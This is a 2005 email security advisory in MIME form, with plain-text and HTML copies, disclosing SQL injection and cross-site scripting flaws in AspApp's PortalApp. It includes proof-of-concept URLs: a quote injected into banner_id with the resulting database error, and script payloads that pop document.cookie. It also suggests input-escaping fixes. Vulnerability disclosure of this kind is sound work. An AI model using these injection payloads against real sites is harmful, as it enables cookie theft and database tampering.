This is a multi-part message in MIME format. ------=_NextPart_000_0046_01C53454.58BFA8E0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Dcrab 's Security Advisory http://icis.digitalparadox.org/~dcrab http://www.hackerscenter.com/ Severity: Medium Title: Multiple sql injection, and xss vulnerabilities in PortalApp. Date: March 30, 2005 Vendor: AspApp Vendor site: http://www.aspapp.com Summary: There are multiple sql injection, xss vulnerabilities in the PortalApp. Proof of Concept Exploits: http://localhost/ad_click.asp?banner_id=3D'SQL_INJECTION Microsoft JET Database Engine error '80040e14' Syntax error in string in query expression 'banner_id =3D = 'SQL_INJECTION'. /ad_click.asp, line 14 http://localhost/content.asp?contenttype=3D%22%3E%3Cscript%3Ealert(docume= nt.cookie)%3C/script%3E Pops cookie http://localhost/content.asp?do_search=3D1&keywords=3D'%3E%3Cscript%3Eale= rt(document.cookie)%3C/script%3E Pops cookie Possible fix: The usage of htmlspeacialchars(), mysql_escape_string(), = mysql_real_escape_string() and other functions for input validation = before passing user input to the mysql database, or before echoing data = on the screen, would solve these problems. Author: These vulnerabilties have been found and released by Diabolic Crab, = Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free to = contact me regarding these vulnerabilities. You can find me at, = http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. = Lookout for my soon to come out book on Secure coding with php. -----BEGIN PGP SIGNATURE----- Version: PGP 8.1 - not licensed for commercial use: www.pgp.com iQA/AwUBQkjxjyZV5e8av/DUEQJTagCeMdB58bY72TMo6mITsSHLByjCT/MAnjRM n0K6nk2uxIlFknfglJIoUkqq =3DV5fo -----END PGP SIGNATURE----- ------=_NextPart_000_0046_01C53454.58BFA8E0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META http-equiv=3DContent-Type content=3D"text/html; = charset=3Diso-8859-1"> <META content=3D"MSHTML 6.00.2900.2604" name=3DGENERATOR> <STYLE></STYLE> </HEAD> <BODY bgColor=3D#ffffff><FONT face=3DArial size=3D2> <DIV><BR>-----BEGIN PGP SIGNED MESSAGE-----<BR>Hash: SHA1</DIV> <DIV> </DIV> <DIV>Dcrab 's Security Advisory<BR><A=20 href=3D"http://icis.digitalparadox.org/~dcrab">http://icis.digitalparadox= .org/~dcrab</A><BR><A=20 href=3D"http://www.hackerscenter.com/">http://www.hackerscenter.com/</A><= /DIV> <DIV> </DIV> <DIV>Severity: Medium<BR>Title: Multiple sql injection, and xss=20 vulnerabilities in PortalApp.<BR>Date: March 30, = 2005<BR>Vendor:=20 AspApp<BR>Vendor site: <A=20 href=3D"http://www.aspapp.com">http://www.aspapp.com</A></DIV> <DIV> </DIV> <DIV>Summary:<BR>There are multiple sql injection, xss vulnerabilities = in the=20 PortalApp.</DIV> <DIV> </DIV> <DIV>Proof of Concept Exploits:</DIV> <DIV> </DIV> <DIV><A=20 href=3D"http://localhost/ad_click.asp?banner_id=3D'SQL_INJECTION">http://= localhost/ad_click.asp?banner_id=3D'SQL_INJECTION</A><BR>Microsoft=20 JET Database Engine error '80040e14'</DIV> <DIV> </DIV> <DIV>Syntax error in string in query expression 'banner_id =3D=20 'SQL_INJECTION'.</DIV> <DIV> </DIV> <DIV>/ad_click.asp, line 14</DIV> <DIV> </DIV> <DIV><BR><A=20 href=3D"http://localhost/content.asp?contenttype=3D%22%3E%3Cscript%3Ealer= t(document.cookie)%3C/script%3E">http://localhost/content.asp?contenttype= =3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E</A><BR>Pops=20 cookie</DIV> <DIV> </DIV> <DIV><BR><A=20 href=3D"http://localhost/content.asp?do_search=3D1&keywords=3D'%3E%3C= script%3Ealert(document.cookie)%3C/script%3E">http://localhost/content.as= p?do_search=3D1&keywords=3D'%3E%3Cscript%3Ealert(document.cookie)%3C/= script%3E</A><BR>Pops=20 cookie</DIV> <DIV> </DIV> <DIV><BR>Possible fix: The usage of htmlspeacialchars(), = mysql_escape_string(),=20 mysql_real_escape_string() and other functions for input validation = before=20 passing user input to the mysql database, or before echoing data on the = screen,=20 would solve these problems.</DIV> <DIV> </DIV> <DIV>Author:<BR>These vulnerabilties have been found and released by = Diabolic=20 Crab, Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel = free to=20 contact me regarding these vulnerabilities. You can find me at, <A=20 href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A> = or <A=20 href=3D"http://icis.digitalparadox.org/~dcrab">http://icis.digitalparadox= .org/~dcrab</A>.=20 Lookout for my soon to come out book on Secure coding with php.</DIV> <DIV> </DIV> <DIV>-----BEGIN PGP SIGNATURE-----<BR>Version: PGP 8.1 - not licensed = for=20 commercial use: <A href=3D"http://www.pgp.com">www.pgp.com</A></DIV> <DIV> </DIV> <DIV>iQA/AwUBQkjxjyZV5e8av/DUEQJTagCeMdB58bY72TMo6mITsSHLByjCT/MAnjRM<BR>= n0K6nk2uxIlFknfglJIoUkqq<BR>=3DV5fo<BR>-----END=20 PGP SIGNATURE-----<BR></FONT></DIV></BODY></HTML> ------=_NextPart_000_0046_01C53454.58BFA8E0--